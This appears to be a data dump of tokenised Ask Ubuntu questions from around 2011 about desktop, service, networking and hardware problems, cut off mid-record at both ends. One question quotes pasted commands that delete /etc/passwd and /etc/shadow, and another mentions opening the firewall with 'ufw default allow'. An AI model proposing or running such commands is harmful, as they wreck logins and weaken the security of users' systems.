core ( tm ) i7 cpu 950 @ 3.07ghz stepping : 5 cpu mhz : 2794.000 cache size : 8192 kb physical id : 0 siblings : 8
62756	where do i set use_time_for_policy ?	where do i find the `` use_time_for_policy '' fix in ubuntu 11.10 oneiric ocelot ? this post fixed it before . laptop immediately suspends when going onto battery power i installed dconf-tools ( dconf-editor ) but a - didnt find a `` search '' option like gconf-editor , and b - after looking through them one by one , couldnt even find an entry similar to use_time_for_policy . did i just miss it , or is there something else i need to be doing / looking for ?
62758	how to make apt-cache , apt-get into one command ?	in ubuntu 11.04 or 10.04 , how can i make the apt-get , apt-cache all in one myapt so that i can simply use one only , like in fedora ? for example : myapt search yum # same as apt-cache search myapt remove yum # same as apt-get remove myapt install yum # same as apt-get install any idea how to do alias for this ?
62760	does ubuntu 11.04 fully support trim ?	does ubuntu 11.04 fully support trim ? and what happens if it does n't , will my ssd wear out ?
62761	is there a way to move the unity launcher 'show ' edge on multiple monitor setup ?	i 'm in a situation where my primary monitor is on my right and that is the screen with the unity launcher . when i fullscreen an app , the edge that actually tiggers the launcher to reappear is on my left , on the screen that does not have the launcher . is there a way to fix this without moving the unity launcher to my left ? this is under ubuntu 11.04 .
62762	no sound in oil rush	i 've installed oil rush using desura ( currently in beta ) using ubuntu 11.04 64 bit . the game runs perfectly fine except i ca n't hear any sound . what suggestions do you have ? note : i also had the same problem with shadowgrounds survivor and this fix no sound in shadow-grounds survivor ? ( 64bit ) worked for me . problem is that oil-rush does n't have a lib32/lib directory .
62766	enable auto-completion of apt-get for non-privileged user ?	i 've enabled apt-get in sudo without password , and bash autocompletion for it need to be enabled as well , but how ? if i try to source that file : % > . /etc/bash_completion.d/apt no command 'have ' found , did you mean : command 'vave ' from package 'lipsia ' ( universe ) command 'havp ' from package 'havp ' ( universe ) command 'haxe ' from package 'haxe ' ( universe ) command 'dave ' from package 'libhttp-dav-perl ' ( universe ) command 'save ' from package 'atfs ' ( universe ) have : command not found no command 'have ' found , did you mean : command 'vave ' from package 'lipsia ' ( universe ) command 'havp ' from package 'havp ' ( universe ) command 'haxe ' from package 'haxe ' ( universe ) command 'dave ' from package 'libhttp-dav-perl ' ( universe ) command 'save ' from package 'atfs ' ( universe ) have : command not found
62768	installing ubuntu server on ibm ds series with san booting and multipath io	has any one installed ubuntu server 11.04 on ibm ds series with san booting and multi path io ( fibre channel ) ?
62774	is there a solid howto for replacing mysql with maria in the lamp stack ?	i 've heard great feedback on a few folks migrating production machines ( including from this question ) , and i 'd like to test the transition in our dev environment . maria is apparently in the 11.10 repos , but there has to be more to it than just apt-get install ; what else needs to be done to switch it out ? do the php5-mysql libraries work out-of-the proverbial box ? a quick google did n't turn up anything , so i was hoping someone could either point me to a good article , or lay out the steps in an answer here .
62777	where does luakit keep my bookmarks file ?	i installed luakit from the repos ( sudo apt-get install luakit ) and it seems to work fine , remembering my bookmarks and everything . the trouble is , i ca n't figure out where it stores this data . any ideas ?
62781	how do i adjust the snap size in compiz grid ?	i 'd like to change my snap to by default cover 2/3rds of the right side of the screen when i snap to the right , for example - as opposed to the 1/2 it 's doing right now . is there a way to adjust the default settings ?
62786	how to get back default upper right corner notifications ?	i recently installed xubuntu/xfce session using ubuntu software center in order to test how xfce would look like . i did n't like it , so i removed those packages and got back to the default unity shell . but now the notifications that appear in the upper right corner no longer look like they should . instead of that default transparent black design now there is a grey window , like this : ( this is an example from pidgin , i do n't know if it has some importance ) . everything looks ok but those notifications . what can i do to have back the original style ?
62787	which information to provide on a wireless bug report ?	i own a belkin wireless usb adapter . it seems to be supported by the rtl8192cu driver in 11.10 betas , which is great , because in 11.04 the driver had to be compiled/installed manually . but , nobody is perfect , and i seem to have some driver-related problems with the dongle . it seems that it is able to connect only after several retries ( taking the dongle out and plugging it in another port ) , or after a reboot , or sometimes at the first boot . i do n't know how to diagnose this wireless things from the command line , so i 'll tell you what i see in kubuntu 's network manager : when it ca n't connect , it says `` configuring interface '' for a loong time , and then sometimes `` waiting for authorization '' . nothing else . what i 'm asking is : what type of information ( logs , traces , etc ) , and how do i exactly get it ( where is it , is there a special command like dmesg ) , in order to try to troubleshoot the problem myself , have better chances to spot a duplicate bug report . provide that information in a new bug report . i 'd appreciate as much information as possible regarding this matter , because i 've never done it but i 've already needed it in the past . update i 've finally filed a bug report on this matter . does anybody know why might be this happening ?
62788	top left window corner pixel without clickable function	from 11.04 getting used to quickly push the mouse into the top left corner to make the launcher appear , i have to realize that in 11.10 only the globalmenu appears . what 's the intended functionality for the top left area , please ? this seems quite bad to me as with many icons in the dash i have to scroll first the launcher upwards to be able to click on the dash icon .
62790	upstart service never starts or stops completely	i 'm trying to make a simple upstart script for teamspeak server , but ca n't make it work . when i say initctl start it just executes but never finishes or even emits any message . same is happening for stop . to be sure i am not doing anything wrong , i have copied the cron script and tried to run it , but it happens the same . what am i doing wrong here ? update : here is my script for ts3 : # myservice - myservice job file description `` my service description '' author `` me < myself @ i.com > '' # stanzas # # stanzas control when and how a process is started and stopped # see a list of stanzas here : http : //upstart.ubuntu.com/wiki/stanzas # respawn # when to start the service start on runlevel [ 2345 ] # when to stop the service stop on runlevel [ 016 ] # automatically restart process if crashed respawn # essentially lets upstart know the process will detach itself to the background expect fork # start the process script emit going into ts3 dir chdir /home/danizmax/teamspeak3-server_linux-x86/ emit starting ts3 exec su -c `` /home/danizmax/teamspeak3-server_linux-x86/ts3server_startscript.sh start '' danizmax & emit done end script i tried even with simplest script , and that also does n't work : description `` regular background program processing daemon '' start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] expect fork respawn exec echo example console output thank you for your help .
62794	location of .desktop file of `` application lens '' of unity	i would like to modify quicklist of unity `` application lens '' but i have n't managed to find .desktop file which i could modify . could you please help me ? screenshot of quicklist of unity application len : the quicklist was activated with right-click on the icon known quicklist modifications : list of custom launchers & quicklists for unity /usr/share/unity/places/applications.place file found but i have n't managed to edit it in a manner that would lead to quicklist modification as new items in quicklist of launchers were appended here : list of custom launchers & quicklists for unity , i wanted to append new items in quicklist of applications lens . just other commands related with applications management to be present in this quicklist . ( i want to have as less icons on unity bar as possible ) . but maybe i will really have to create separate launcher for the commands .
62795	where do i find packages files of apps that are installed	i want to backup my application setup files . ( source packages ) so can anybody please help me find the location where these setup files are stored in ubuntu natty narwhal .
62800	is it possible to install ubuntu on a mainboard asus p8h67-m with uefi bios ?	i 've looked at several posts but have n't really found an answer .
62802	how to find/install build dependencies for building gstreamer plugins ?	is there any way to install these packages via apt-get ? i found none of them with apt-cache search . arts ( for the arts plugin wrapper , and the artsd sink ) http : //www.arts-project.org libdvdread ( for the dvdsrc ) http : //www.dtek.chalmers.se/groups/dvd/ ( optional : libcss for encrypted dvds ) libdvdnav ( for the dvdnavsrc ) http : //dvd.sourceforge.net/ ( optional : libcss for encrypted dvds ) > = 0.1.9 libgsm ( for the gsm plugin ) http : //kbs.cs.tu-berlin.de/~jutta/toast.html sdl ( for the sdl sink ) http : //www.libsdl.org swfdec ( for the swfdec ( flash ) plugin ) http : //www.schleef.org/swfdec/ dtsdec ( for dts audio decoding ) http : //www.videolan.org/libdca.html divx ( for divx decoding ) http : //www.divx.com/divx/linux/ musepack ( for musepack audio codec/format ) ( http : //www.musepack.net/ ) nas ( for the nas sound server sink ) ( http : //radscan.com/nas.html ) libmms ( for mms protocol support ) ( http : //www.sf.net/projects/libmms ) libamrnb ( for amr-nb support ) ( http : //www.penguin.cz/~utx/amr ) libamrwb ( for amr-wb support ) ( http : //www.penguin.cz/~utx/amr ) libkate ( for kate support ) ( http : //libkate.googlecode.com/ )
62805	remove specified packages if they have no dependencies	i installed a package by mistake and immediately removed ( purged it to be exact ) it , but other than the package itself , none of the dependencies that installed alongside was removed . i do not know if it 's required or not , but if no , i would like to remove them .
62806	a client for newsgroup or email	i used mutt for a long time . but i found that every mail from google group can not show ascii_char to indicate threads ( i subscribed some google groups ) . i guess that google group is a newsgroup . so mutt can not indicate with ascii_char . if no ascii_char to indicate i can not find which one is for reply which thread . so , i ask for a method for mutt to solve this . or , alternatively , suggest some clients to do this .
62808	gnome-shell does not display top toolbar panel using a mobility radeon 5650	gnome shell installed through software centre does not display top toolbar panel properly ( missing text and icons ) , and when one of the icons on it eg user 's name is clicked the menu popup has missing text . also when searching for application after pressing the super key , the filter list on the right is also missing random text letters often replaced by small rectangular [ ] shape . edit : it 's the ati drivers ( using mobility radeon 5650 ) , but after it 's un-installed gnome-panel falls back to classic only and the system has to be reinstalled for the gnome-panel to work again . if the ati drivers are not installed even the login screen lags when typing password . also the ati ( post-release ) driver never installs properly , the standard however does .
62812	why is n't my upstart service starting on system boot ?	following on from this question , i have written a simple upstart service ( /etc/init/pms.conf ) for my headless ubuntu server 11.04 box as follows : start on filesystem and net-device-up iface=eth0 stop on runlevel [ 016 ] respawn exec /home/administrator/pms-current/pms.sh i can start ( or stop ) this service at will from the command line : service pms start and i can see that it is indeed running . however , when i first boot my machine the service does not start . if i ssh into the box and check the service status i get : $ service pms status pms stop/waiting my question is why is this happening ? why is n't my service starting on boot ? update 1 : unsure whether my service was being started and subsequently dying or just was n't being start at all , i added the following to pms.sh : echo `` started '' > $ startlog this obviously just gives me something to look for . i tested this by starting the service myself and then checking start.log . i then deleted the start.log and rebooted . it was n't there after the restart , so it seems as though upstart definitely is n't starting my service . i suppose it could be dying at an earlier point in the process , but that seems rather unlikely given the simplicity of it all . update 2 : i 've just upgraded to 11.10 which includes an upstart upgrade , but this problem still occurs . update 3 : as requested , i 've booted with -- debug . the output of cat /var/log/syslog | grep init is too long to place in the question , but you view it here . update 4 : more logs , this time the upstart conf is included at the top . run 1 and run 2 .
62813	hard disk using lvm shows `` 8 % contiguous '' on startup . how serious is it ?	my desktop runs ubuntu 11.04 61-bit server with lvm . i use xfce 4 as a gui on top of the server . recently , i get a message on every startup which says `` /dev/sda1 was not properly unmounted . check forced '' . after the check completes , it now shows that hard disk is `` 8 % contiguous '' . a week ago it showed 4 % contiguous and now it has gone up to 8 % . i get the same message irrespective of whether i shutdown from the terminal or using xfce 's shutdown button . how serious is this issue ? is there any serious risk of data damage/corruption ? is it time to get a new hard disk ? ( edit : fix spelling of contigous , was `` contagious '' )
62815	does openoffice 3.3.0 still have the command `` oowriter '' ?	my ubuntu is 10.10 with some default version of openoffice . in order to install some plugin , i have uninstalled the openoffice and installed a new version 3.3.0 by downloading it from its official website , following this instruction . but in the new openoffice , i find that a command i used quite often before called oowriter does not exist anymore . i wonder if 3.3.0 has an equivalent command ? thanks !
62816	app launch `` outside '' of the unity-panel launcher	i created a .desktop file for the `` explotux '' game ( see https : //gna.org/projects/explotux/ ) , but the launcher does not match the app window . to be clear : when i click the launcher on the unity panel , the game launches and work fine but the game window is represented by a new `` launcher '' in the panel . here is a screenshot : . the upper launcher is my .desktop , the other is the one that appears when the game is running ( note that there is only one opened window and that the panel icon show 3 arrows as in `` 3 open windows '' ... ) . i tried to pin this new launcher but then it makes unity crashy . where do you think the problem is ? i tested on both natty and oneiric . here is the code of my .desktop file : [ desktop entry ] version=1.0 name=explotux comment=a bomberman like in 3d exec=/usr/games/explotux icon=explotux terminal=false type=application categories=game ; actiongame ; edit : i have a similar problem in gnome-shell :
62820	how to find out which `` unknown '' program is still running and preventing shutdown ?	i get the window below occasionally on shutdown . is there any way to find out what the `` unknown '' program is ? perhaps find the path of the executable ?
62822	firefox still starts full screen	i thought that this bug should be solved in oneiric beta 2 . but i still have this problem with firefox , thunderbird etc . any workaround ?
62830	how to list the simplest way of hardware specification ?	i want to know the computer 's hardware specifications . like : cpu : xxx motherboard : xxx memory : xxx video card : xxx pci : xxx thank you~
62833	how do i change the default session for when using auto-logins ?	when autologon is active , lightdm will start the unity 3d session , not the 2d ( or any other shell that i want to auto-login to ) . is there a way to start the shell i want automatically ( autologon ) ? anyway , if autologon is disabled , the last used session is launched , and that 's fine . i just want to choose which is default with autologon .
62834	not getting allocate drive space option	i want to install ubuntu along with windows7 . for that i have downloaded ubuntu 11.04 and burned it on a cd . when i am installing the ubuntu till `` preparing to install ubuntu '' .after i clicking on the forward button it is not going to the next step , probably to allocate `` allocate disk space '' option . i have 250 gb hard disk in which 100 mb is reserved for windows 7 and 25 gb is for windows7 ( c : drive ) , 25 gb is unallocated space and the remaining is data drive ( working drive ) . what could be the problem ?
62837	how do i deactivate the lower part of touchpad in hp mini ?	hi anyone who can tell me how to deactivate the lower part of touchpad in hp mini ? is it posible ? whenever i try to click , the arrow appears in the lower corner ( and not where it should be ) . please can anyone help ; )
62838	has `` auto eth0 '' been renamed to `` automatic ethernet '' ?	today when i checked my network settings i saw that there in addition to the connection `` auto eth0 '' was the connection `` automatic ethernet '' ( and i have n't added it myself nor done any changes to the network configuration ) . the only difference is that the latter has no assigned mac address . is this a sign of some new change to the network manager ? or what is it ?
62839	the led on the touchpad on my hp pavaillion dv6-6080 does n't work	i have a hp pavillion dv6-6080 . my touchpad work fine but the led light does n't work . when i turn it off the red light work prefect but when turn it on nothing happen and the white light does n't appear . please tell me how i can turn it back ?
62840	how to troubleshoot a hostname problem ?	i have a ubuntu desktop pc and a windows 7 laptop . they have network connection over a wifi router , which gives them local ip addresses . both computers see each other when pinged by ip . the ubuntu pc can ping the windows machine by hostname , but the windows laptop ca n't ping the ubuntu pc . it looks like this is a common problem with a well-known solution , as seen from this question : access server by host name ? , as well as some duplicates . however , the solution there is `` install avahi '' . i have avahi running , and it does not help for me . i have no idea how to troubleshoot from here . from the ubuntu pc : rumtscho @ bradbury : ~ $ sudo service avahi-daemon restart [ sudo ] password for rumtscho : avahi-daemon start/running , process 3019 and then on the windows laptop : c : \users\rumtscho > ping bradbury.local ping-anforderung konnte host `` bradbury '' nicht finden . überprüfen sie den namen , und versuchen sie es erneut . which means , roughly , `` hostname not found '' . i did n't find anything suspicious in avahi.conf . here are the working lines of the file ( everything else is commented out ) : [ server ] use-ipv4=yes use-ipv6=yes [ wide-area ] enable-wide-area=yes [ rlimits ] rlimit-core=0 rlimit-data=4194304 rlimit-fsize=0 rlimit-nofile=768 rlimit-stack=4194304 rlimit-nproc=3 i tried both pinging bradbury and bradbury.local . i also tried uncommenting the line publish-addresses=yes in the conf file . both did n't work . any ideas what i am doing wrong ? how can i find it out , what are my options ? update i was told in chat that the windows pc needs a `` multicast dns resolver '' , so i installed bonjour . now the error message is different : ping wird ausgeführt für bradbury.local [ *ipv6 address edited out* ] mit 32 byt es daten : zielhost nicht erreichbar . zielhost nicht erreichbar . zielhost nicht erreichbar . zielhost nicht erreichbar . ping-statistik für *ipv6 address edited out* : pakete : gesendet = 4 , empfangen = 0 , verloren = 4 < 100 % verlust > , '' zielhost nicht erreichbar '' means `` can not reach target host '' , and there is 100 % packet loss . so what should i do to make the ubuntu pc reachable
62844	ssh permission denied in terminal but not innautilus	i have two ubuntu machines on the same network . i installed openssh-server and client . when i try to connect through the terminal i get the following message : `` permission denied , please try again '' . then after attempting to type my password in get the last message : `` permission denied ( publickey , password ) '' however i can ssh to the computer through nautilus , with no problem .
62845	how to hide window title and menu bar in gnome shell ?	is it easily possible in gnome 3 's gnome-shell to achieve similar appearance of windows ' title and menu bars as with unity 's globalmenu ?
62846	removing test os and effects on grub	i already dual-boot my laptop with a windows 7 and an ubuntu 10.10 partition . since this is both a development and experimenting system , i made a small 15 gb partition for the purpose of trying out new distros and see what i like . essentially , this is an experiment partition where i can screw around and see what works and what does n't . i installed the beta of 11.10 last week , but do n't like it too much as it seems to shift quite a bit towards windows/mac gui-centric usage , while earlier ubuntu distros were a good split between gui/cli interfaces . my issue is it installed a new grub overlay . if i reformat the partition , will the os links in the bootloader be untouched , or do i have to re-install grub after the partition format ?
62847	ubuntu one - offline sync music on android	what is the easiest/best way to make files available off line ( offline cache ) - i am on android 2.3 on htc desire.. i have an option saying save to phone but all that happens when i select songs and select this button is that the first song in my list seems to download constantly . i.e . finishes and then starts again . but no song is available off line .
62848	accidently un-checked the synchronise check box for a folder . now it wont let me re-check it	in the file browser on the desktop i accidentally unchecked the synchronize check box for my pictures folder . it wont let me recheck it , it just says that `` this folder can not be synchronized as it contains one or more folders that is already synchronized '' . ive looked on the web interface for my ubuntu one account and the `` pictures folder '' and all subfolders have dissiappeared from the account . how on earth do i get this ( rather important ) folder to resynchronize ?
62849	installing libxml-dev package	i need this package installed http : //packages.ubuntu.com/search ? keywords=libxml-dev but ca n't find it ubuntu software center . any idea ?
62850	injecting packages installed from source into apt/synaptic	example : i build/install sox myself , as provided ubuntu package did not include additional audio format libraries that i might use and it 's one of the packages i want latest version anyway . now i want to install eboard with synaptic , and it wants to install sox , but as mentioned sox is already installed and working perfectly and i do n't want to mess it with another install while i want to install eboard without building it from source . this is example to problem i faced couple of times and thought to ask what linux users do in such cases as i 'm a new user .
62857	i broke logins to my server by fiddling with /etc/passwd and /etc/shadow	i am running an ubuntu server ( with ebox/zentyal installed ) . i believe it uses a combination of ldap users and local users but i currently can not login ( through ssh ) with any of them . i was trying to fix a user problem on another box i was playing around with and accidentally pasted the following commands from a forum : rm /etc/passwd pwconv rm /etc/shadow cp /etc/passwd- /etc/passwd pwconv so i am hoping i fixed my passwd file by restoring it from the /etc/passwd- , but i still ca n't login with my admin user ( i still have a root terminal open though ) . any ideas on how to at least get my admin user to login through ssh again ( it 's a local user , not an ldap one ) ? i tried setting a new password with passwd admin but i am getting an authentication token manipulation error ( which was the problem i was trying to solve in the first place ) . tried danny 's fix below : root @ server : /etc # useradd -g admin kribor root @ server : /etc # passwd kribor passwd : authentication token manipulation error passwd : password unchanged
62858	turn off monitor using command line	i am runnning ubuntu server on my laptop . there is really no reason for the screen to be on . i have been trying to use this command to turn the screen off : sleep 1 & & xset dpms force off the problem is i get the following error unable to open display `` '' . any idea what is going on / what is wrong ? any other suggestions for how to do this ?
62859	how would i remove/ignore bad sectors in the ubuntu live cd ?	i have 195 bad sectors that wo n't be moved to that reserve section on my hdd . so how do i make the os ignore them ? i 've deleted all the partitions and tried to write over them , but ... i think i heard 'badblocks ' fixes things like this , but i did n't know where to get it or even how to use it . can somebody help ? i do n't care if it crashes completely in the near future ; i just want it to work for now , so i can have a boot of ubuntu to try out . i 'm confuse : c i know the disk is bad . i just want the installation to keep on writing past the bad sectors . the disk is damaged and likely to fail in the near future . i just know it 's functional enough to use for a month or two ; but the install wo n't go . maybe i should explain how the hard disk failed . my brother hit the side of the computer as hard as he could , which then fell off the desk with the hard disk running . do i have to fix them via that process , or is there another way to get the install to keep on trucking past the bad sectors ?
62862	how can i use awesome wm with gnome ?	i followed the all the instructions i could find -- the ones on the awesome wiki , and the ones on the arch linux wiki , but so far none have really worked . i usually get an error while trying to log in that says `` could not load session 'awesome . ' '' is there something ubuntu users out there have tried with success , for getting this wm to work with a gnome session ?
62863	will 11.10 still make use of blue color to alert the user to things ?	in natty , i really enjoyed the `` blue highlight '' feature as detailed in this great askubuntu question : when do things in the new unity panel turn blue ? in oneiric i notice that the upper left corner is no longer the default launch point for the launcher . also with the absence of the bfb there is no obvious way of alerting to application notices . i have n't noticed any `` blue '' notices in oneiric beta . i assumed the session-indicator would turn blue when updates are available because there is now an update link in the menu . but no joy . and the volume indicator does not turn blue when its muted and music is playing . is this because it 's beta ? i 'm hoping the `` blue '' feature has n't been dropped . it was great !
62868	giving a single user write permissions	i want to grant a single user write permissions to a directory owned by root over command line . with chmod , it seems that i can only change the permissions for owner , group and other , not for a specific user .
62872	how do i connect a wired desktop to internet via a wireless laptop ?	i have a desktop system running ubuntu 10.10 . it has no wireless card just a wired ethernet card . i have a thinkpad t42 laptop running ubuntu 10.10 in the same room as the desktop . it uses its wireless connection to connect to a wireless access point in another room . the wireless access point provides internet access to the laptop . is there anyway to create a wired connection between the desktop and the laptop so that the desktop can connect out to the internet through the laptop ?
62876	how to create a windows 8 startup disk from ubuntu ?	first of all , i 'm not a windows fan . i just want to try windows 8 . but i ca n't boot the usb after extracting the developer release with unetbootin . the blogs mention a windows 7 usb dvd tool which does n't run with wine .
62877	add new files into .deb package you 're building	how do you add new files , eg custom init script into .deb package that you 're building ?
62878	possible to run applications from the cloud ?	when installing ubuntu , i made the partition really small . i would like to know if applications like vlc or clementine be installed and run from the cloud ?
62879	what file is sourced/executed when logging in ?	i 'm trying to add a command to be executed after logging into ubuntu . specifically , xinput set-prop 11 `` device enabled '' 0 . what is the file that is sourced/executed when logging into a user session ?
62880	search files by name instantly	under windows there is a smart software `` everything '' listening to changes in ntfs that allows it to search files by names instantly - for a second or less . is there such ability for ubuntu ?
62881	can not get spotify to run	i installed spotify successfully but it will not let me log in ( error 409 ) . i tried running sudo ufw default allow , but it does not help . any ideas ?
62883	can not load ubuntu image in virtualpc in windows 7	i downloaded ubuntu 32bit and when i open it in a virtual pc , it closes automatically . no choice to install in safe mode . i removed quiet and splash and added single but then it also closes automatically . how can i fix it so i can use ubuntu in a virtual pc ?
62884	how will upgrading my hard drive affect performance ?	below is my cpu information and i run ubuntu os with 1 gb ram with 80gb hdd . currently i am happy with the performance of ubuntu 11.04 . i am planning to upgrade to 500gb or 1tb hdd . is it good idea to upgrade to 500gb hdd with this configuration ? how this will affect the performance of ubuntu ? cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 15 model : 4 model name : intel ( r ) pentium ( r ) 4 cpu 2.80ghz stepping : 1 cpu mhz : 2800.038 cache size : 1024 kb fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc up pebs bts pni dtes64 monitor ds_cpl tm2 cid cx16 xtpr bogomips : 5600.07 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 48 bits virtual power management :
62897	shutdown button disappears when logging in	recently installed the oneiric ocelot and its awesome , but one fine time i logged out of it and when i logged in the shutdown button disappears , when i upgraded from 11.04 to 11.10 got a error message saying that the installation failed due to broken packages and when i restarted it worked.gave this info so that it might give u guys a picture of what happened.had and issue after this with the software center and did't install google chrome from the deb file and had to manually install it from the terminal.had to run the code : apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libcurl3 libnspr4-0d the following new packages will be installed : libcurl3 libnspr4-0d 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 247 kb of archives . after this operation , 668 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/ oneiric/universe libnspr4-0d i386 4.8.7-0ubuntu3 [ 11.1 kb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ oneiric/main libcurl3 i386 7.21.6-3ubuntu3 [ 235 kb ] fetched 247 kb in 2s ( 88.5 kb/s ) *** glibc detected *** /usr/bin/perl : free ( ) : invalid pointer : 0x097a9cac *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x6ebc2 ) [ 0x17ebc2 ] /lib/i386-linux-gnu/libc.so.6 ( +0x6f862 ) [ 0x17f862 ] /lib/i386-linux-gnu/libc.so.6 ( cfree+0x6d ) [ 0x18294d ] /usr/bin/perl ( perl_hv_free_ent+0x64 ) [ 0x80cf934 ] /usr/bin/perl [ 0x80cfcf4 ] /usr/bin/perl ( perl_hv_undef+0x15d ) [ 0x80d2fdd ] /usr/bin/perl ( perl_sv_clear+0x5ac ) [ 0x80e4a2c ] /usr/bin/perl ( perl_sv_free2+0x4b ) [ 0x80e4e9b ] /usr/bin/perl ( perl_sv_clear+0x68c ) [ 0x80e4b0c ] /usr/bin/perl ( perl_sv_free2+0x4b ) [ 0x80e4e9b ] /usr/bin/perl ( perl_hv_free_ent+0x12c ) [ 0x80cf9fc ] /usr/bin/perl [ 0x80cfcf4 ] /usr/bin/perl ( perl_hv_undef+0x15d ) [ 0x80d2fdd ] /usr/bin/perl ( perl_sv_clear+0x5ac ) [ 0x80e4a2c ] /usr/bin/perl ( perl_sv_free2+0x4b ) [ 0x80e4e9b ] /usr/bin/perl ( perl_sv_clear+0x68c ) [ 0x80e4b0c ] /usr/bin/perl ( perl_sv_free2+0x4b ) [ 0x80e4e9b ] /usr/bin/perl ( perl_hv_free_ent+0x12c ) [ 0x80cf9fc ] /usr/bin/perl [ 0x80cfcf4 ] /usr/bin/perl ( perl_hv_undef+0x15d ) [ 0x80d2fdd ] /usr/bin/perl ( perl_sv_clear+0x5ac ) [ 0x80e4a2c ] /usr/bin/perl ( perl_sv_free2+0x4b ) [ 0x80e4e9b ] /usr/bin/perl ( perl_sv_clear+0x68c ) [ 0x80e4b0c ] /usr/bin/perl ( perl_sv_free2+0x4b ) [ 0x80e4e9b ] /usr/bin/perl ( perl_hv_free_ent+0x12c ) [ 0x80cf9fc ] /usr/bin/perl [ 0x80cfcf4 ] /usr/bin/perl ( perl_hv_undef+0x15d ) [ 0x80d2fdd ] /usr/bin/perl ( perl_sv_clear+0x5ac ) [ 0x80e4a2c ] /usr/bin/perl ( perl_sv_free2+0x4b ) [ 0x80e4e9b ] /usr/bin/perl [ 0x80e03e1 ] /usr/bin/perl ( perl_sv_clean_objs+0x27 ) [ 0x80e08b7 ] /usr/bin/perl ( perl_destruct+0x1681 ) [ 0x8079331 ] /usr/bin/perl ( main+0xfb ) [ 0x806145b ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0x129113 ] /usr/bin/perl [ 0x80614d1 ] ======= memory map : ======== 00110000-00286000 r-xp 00000000 08:01 3675077 /lib/i386-linux-gnu/libc-2.13.so 00286000-00288000 r -- p 00176000 08:01 3675077 /lib/i386-linux-gnu/libc-2.13.so 00288000-00289000 rw-p 00178000 08:01 3675077 /lib/i386-linux-gnu/libc-2.13.so 00289000-0028c000 rw-p 00000000 00:00 0 0028c000-00290000 r-xp 00000000 08:01 393617 /usr/lib/perl/5.12.4/auto/io/io.so 00290000-00291000 r -- p 00003000 08:01 393617 /usr/lib/perl/5.12.4/auto/io/io.so 00291000-00292000 rw-p 00004000 08:01 393617 /usr/lib/perl/5.12.4/auto/io/io.so 00292000-00295000 r-xp 00000000 08:01 394356 /usr/lib/perl5/auto/text/charwidth/charwidth.so 00295000-00296000 r -- p 00002000 08:01 394356 /usr/lib/perl5/auto/text/charwidth/charwidth.so 00296000-00297000 rw-p 00003000 08:01 394356 /usr/lib/perl5/auto/text/charwidth/charwidth.so 00297000-0029a000 r-xp 00000000 08:01 393634 /usr/lib/perl/5.12.4/auto/hash/util/util.so 0029a000-0029b000 r -- p 00002000 08:01 393634 /usr/lib/perl/5.12.4/auto/hash/util/util.so 0029b000-0029c000 rw-p 00003000 08:01 393634 /usr/lib/perl/5.12.4/auto/hash/util/util.so 002a7000-002ac000 r-xp 00000000 08:01 394350 /usr/lib/perl5/auto/locale/gettext/gettext.so 002ac000-002ad000 r -- p 00004000 08:01 394350 /usr/lib/perl5/auto/locale/gettext/gettext.so 002ad000-002ae000 rw-p 00005000 08:01 394350 /usr/lib/perl5/auto/locale/gettext/gettext.so 002ae000-002ca000 r-xp 00000000 08:01 3670936 /lib/i386-linux-gnu/libgcc_s.so.1 002ca000-002cb000 r -- p 0001b000 08:01 3670936 /lib/i386-linux-gnu/libgcc_s.so.1 002cb000-002cc000 rw-p 0001c000 08:01 3670936 /lib/i386-linux-gnu/libgcc_s.so.1 002cd000-002f5000 r-xp 00000000 08:01 3675081 /lib/i386-linux-gnu/libm-2.13.so 002f5000-002f6000 r -- p 00028000 08:01 3675081 /lib/i386-linux-gnu/libm-2.13.so 002f6000-002f7000 rw-p 00029000 08:01 3675081 /lib/i386-linux-gnu/libm-2.13.so 002f7000-00347000 r-xp 00000000 08:01 393621 /usr/lib/perl/5.12.4/auto/re/re.so 00347000-00348000 r -- p 0004f000 08:01 393621 /usr/lib/perl/5.12.4/auto/re/re.so 00348000-00349000 rw-p 00050000 08:01 393621 /usr/lib/perl/5.12.4/auto/re/re.so 004cd000-004e2000 r-xp 00000000 08:01 3675083 /lib/i386-linux-gnu/libnsl-2.13.so 004e2000-004e3000 r -- p 00015000 08:01 3675083 /lib/i386-linux-gnu/libnsl-2.13.so 004e3000-004e4000 rw-p 00016000 08:01 3675083 /lib/i386-linux-gnu/libnsl-2.13.so 004e4000-004e6000 rw-p 00000000 00:00 0 00528000-0052d000 r-xp 00000000 08:01 394358 /usr/lib/perl5/auto/text/iconv/iconv.so 0052d000-0052e000 r -- p 00004000 08:01 394358 /usr/lib/perl5/auto/text/iconv/iconv.so 0052e000-0052f000 rw-p 00005000 08:01 394358 /usr/lib/perl5/auto/text/iconv/iconv.so 006d6000-006df000 r-xp 00000000 08:01 396307 /usr/lib/perl/5.12.4/auto/encode/encode.so 006df000-006e0000 r -- p 00008000 08:01 396307 /usr/lib/perl/5.12.4/auto/encode/encode.so 006e0000-006e1000 rw-p 00009000 08:01 396307 /usr/lib/perl/5.12.4/auto/encode/encode.so 007cc000-007d4000 r-xp 00000000 08:01 3675084 /lib/i386-linux-gnu/libnss_compat-2.13.so 007d4000-007d5000 r -- p 00007000 08:01 3675084 /lib/i386-linux-gnu/libnss_compat-2.13.so 007d5000-007d6000 rw-p 00008000 08:01 3675084 /lib/i386-linux-gnu/libnss_compat-2.13.so 0090f000-00917000 r-xp 00000000 08:01 3675079 /lib/i386-linux-gnu/libcrypt-2.13.so 00917000-00918000 r -- p 00007000 08:01 3675079 /lib/i386-linux-gnu/libcrypt-2.13.so 00918000-00919000 rw-p 00008000 08:01 3675079 /lib/i386-linux-gnu/libcrypt-2.13.so 00919000-00940000 rw-p 00000000 00:00 0 00c6a000-00c88000 r-xp 00000000 08:01 3675074 /lib/i386-linux-gnu/ld-2.13.so 00c88000-00c89000 r -- p 0001d000 08:01 